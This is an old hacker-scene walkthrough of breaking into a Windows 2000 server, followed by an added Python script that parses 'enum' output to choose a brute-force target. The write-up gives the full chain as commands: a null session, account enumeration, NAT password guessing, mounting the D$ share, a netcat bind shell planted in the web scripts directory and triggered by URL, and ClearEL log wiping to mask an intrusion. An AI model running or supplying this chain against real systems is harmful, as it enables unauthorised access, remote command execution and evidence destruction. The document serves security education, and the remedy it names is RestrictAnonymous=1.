Shows how easy it REALLY is to break into an unsecured NT system....

A friend of mine asked me to check the security on his newly installed Windows 2000 server since he was running a website off it. All he would provide me was the IP address. Of course, since I knew he was on DSL I didn't need to do much recon and was able to focus in on his system directly. I figured since this was going to be an 'easy' task, I would eschew any GUI and do this all from command line utilities (they're more fun anyway :) ), so my first step was to attempt to establish a null session using the command

    net use \\192.168.1.1\IPC$ "" /user:""

Of course, I knew he was a Novell guy and probably hadn't studied NT security much, so it was no surprise to get the response:

    The command completed successfully

Ok, now that I had a null session to the remote system, I used a program called 'enum' to take a look at the users, shares, and policies of the system, using the command

    enum -U -M -S -P -G -L -d 192.168.1.1 >enum.txt

which provided me with the following output:

    server: 192.168.1.1
    setting up session... success.
    password policy:
      min length: none
      min age: none
      max age: 42 days
      lockout threshold: none
      lockout duration: 30 mins
      lockout reset: 30 mins
    opening lsa policy... success.
    server role: 3 [primary (unknown)]
    names:
      netbios: SERVER
      domain: WEB
    quota:
      paged pool limit: 33554432
      non paged pool limit: 1048576
      min work set size: 65536
      max work set size: 251658240
      pagefile limit: 0
      time limit: 0
    trusted domains:
      indeterminate
    netlogon done by a PDC server
    getting user list (pass 1, index 0)... success, got 3.
      Administrator  attributes:
      Guest (Built-in account for guest access to the computer/domain)  attributes: disabled no_passwd
      nobody (Built-in account for administering the computer/domain)  attributes:
    enumerating shares (pass 1)... got 3 shares, 0 left:
      fs: C$ ()
      fs: D$ ()
      fs: E$ ()
      ipc: IPC$ (Remote IPC)
    getting machine list (pass 1, index 0)... success, got 0.
    Group: Administrators
    SERVER\nobody
    Group: Backup Operators
    Group: Guests
    SERVER\Guest
    Group: Power Users
    Group: Replicator
    Group: Users
    NT AUTHORITY\INTERACTIVE
    NT AUTHORITY\Authenticated Users
    SERVER\Administrator
    cleaning up... success.

As you can see, that's more than enough info to start with. Looking down the list, it is obvious that the original administrator account had been renamed to 'nobody' and a fake 'administrator' account had been set up, most likely with shit permissions. Needless to say, it was to be the 'nobody' account that I would hit next with the command:

    nat -o output.txt -u nobody.txt -p passlist.txt 192.168.1.1

which revealed the password 'sadie' after about 30 minutes. From there, it was simple to map a drive with

    net use y: \\192.168.1.1\d$ /user:nobody

and then enter the password (sadie) when prompted. From there I was able to copy netcat into the /scripts directory, where I could activate it at will by typing the command:

    http://192.168.1.1/cgi-bin/nc.exe?+-l+-p+5000+-t+-e+cmd.exe

into my browser. From there I only had to drop to a DOS prompt and type:

    TELNET> open 192.168.1.1 5000

to get a command prompt on the remote system. Needless to say, after I kicked my friend's ass, I had him set RestrictAnonymous=1, which stops both the null connection AND enum from working. However, there are still a LOT of systems out there that have RestrictAnonymous=0 (which is the default) and are vulnerable. Of course I didn't bother to clean the logs since I was there with permission and I wanted him to see the entries, but had I been there maliciously, I would have uploaded ClearEventLog and run the command

    ClearEL all

which would have cleared all 3 event logs and effectively masked my presence :)

ThePsyko
Public Enemy #7
"God told me to skin you alive"
http://prozac.iscool.net
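Added example, not part of the original write-up: a short Python script that parses enum's text report and automates the inference the author drew by eye from the listing above. It flags the policy gaps that made the NAT run feasible (no minimum length, no lockout threshold), the enumerable admin shares, and the renamed built-in Administrator, which gives itself away twice: it keeps the default "Built-in account for administering the computer/domain" description after the rename, and it is the only member of Administrators while the account still named 'Administrator' sits in Users. The sample input is the page's own listing reassembled one field per line as enum prints it (that layout is my reconstruction); the regexes, heuristics and function names are mine.

```python
import re

# Constructed sample input: the enum listing from the write-up, reassembled
# one field per line.  Host, account and share names are the page's own.
SAMPLE_ENUM_OUTPUT = """\
server: 192.168.1.1
setting up session... success.
password policy:
  min length: none
  min age: none
  max age: 42 days
  lockout threshold: none
  lockout duration: 30 mins
  lockout reset: 30 mins
opening lsa policy... success.
names:
  netbios: SERVER
  domain: WEB
getting user list (pass 1, index 0)... success, got 3.
  Administrator  attributes:
  Guest (Built-in account for guest access to the computer/domain)  attributes: disabled no_passwd
  nobody (Built-in account for administering the computer/domain)  attributes:
enumerating shares (pass 1)... got 3 shares, 0 left:
  fs: C$ ()
  fs: D$ ()
  fs: E$ ()
  ipc: IPC$ (Remote IPC)
Group: Administrators
SERVER\\nobody
Group: Backup Operators
Group: Guests
SERVER\\Guest
Group: Users
NT AUTHORITY\\INTERACTIVE
NT AUTHORITY\\Authenticated Users
SERVER\\Administrator
cleaning up... success.
"""

# Default description Windows gives the built-in Administrator account.
# Renaming the account does not change it, so it betrays the rename.
BUILTIN_ADMIN_COMMENT = "Built-in account for administering the computer/domain"

POLICY_RE = re.compile(r"^\s*(min length|min age|max age|lockout threshold|"
                       r"lockout duration|lockout reset):\s*(.+?)\s*$", re.M)
USER_RE = re.compile(r"^\s*(\S+)(?:\s+\((.*?)\))?\s+attributes:\s*(.*)$")
SHARE_RE = re.compile(r"^\s*(fs|ipc):\s+(\S+)\s+\((.*)\)\s*$")
GROUP_RE = re.compile(r"^Group:\s+(.+?)\s*$")


def parse_enum(text):
    """Turn enum's text report into a dict of policy, users, shares and groups."""
    info = {"policy": dict(POLICY_RE.findall(text)),
            "users": {}, "shares": [], "groups": {}}
    in_users, group = False, None
    for line in text.splitlines():
        if line.startswith("getting user list"):
            in_users = True
            continue
        if line.startswith("enumerating shares"):
            in_users = False
            continue
        if in_users:
            m = USER_RE.match(line)
            if m:
                info["users"][m.group(1)] = {"comment": m.group(2) or "",
                                             "attrs": m.group(3).split()}
            continue
        m = SHARE_RE.match(line)
        if m:
            info["shares"].append((m.group(1), m.group(2)))
            continue
        m = GROUP_RE.match(line)
        if m:
            group = m.group(1)
            info["groups"][group] = []
            continue
        if group is not None and "\\" in line:      # DOMAIN\member line
            info["groups"][group].append(line.strip())
    return info


def assess(info):
    """Derive the findings a pentester would act on from a parsed report."""
    pol, users = info["policy"], info["users"]
    findings = []
    if pol.get("min length") == "none":
        findings.append("no minimum password length")
    if pol.get("lockout threshold") == "none":
        findings.append("no account lockout: online password guessing is unthrottled")
    admin_shares = sorted(n for kind, n in info["shares"] if kind == "fs" and n.endswith("$"))
    if admin_shares:
        findings.append("administrative shares enumerable: " + ", ".join(admin_shares))
    # Strip the SERVER\ or NT AUTHORITY\ prefix to get bare account names.
    admins = sorted(m.split("\\", 1)[-1] for m in info["groups"].get("Administrators", []))
    renamed = sorted(u for u, d in users.items()
                     if u != "Administrator" and d["comment"] == BUILTIN_ADMIN_COMMENT)
    decoy = sorted(u for u in users if u == "Administrator" and u not in admins)
    for u in renamed:
        findings.append("built-in Administrator renamed to '%s' (default description kept)" % u)
    for u in decoy:
        findings.append("account '%s' is not in Administrators: decoy, do not waste guesses on it" % u)
    return {"findings": findings, "admins": admins,
            "renamed_admin": renamed, "decoy_admin": decoy}


if __name__ == "__main__":
    report = assess(parse_enum(SAMPLE_ENUM_OUTPUT))
    print("Administrators:", ", ".join(report["admins"]))
    for f in report["findings"]:
        print(" -", f)
```

Feed it a saved enum.txt instead of the sample and the same two checks pick the account to target: the group membership is authoritative, and the untouched default description is the corroborating tell.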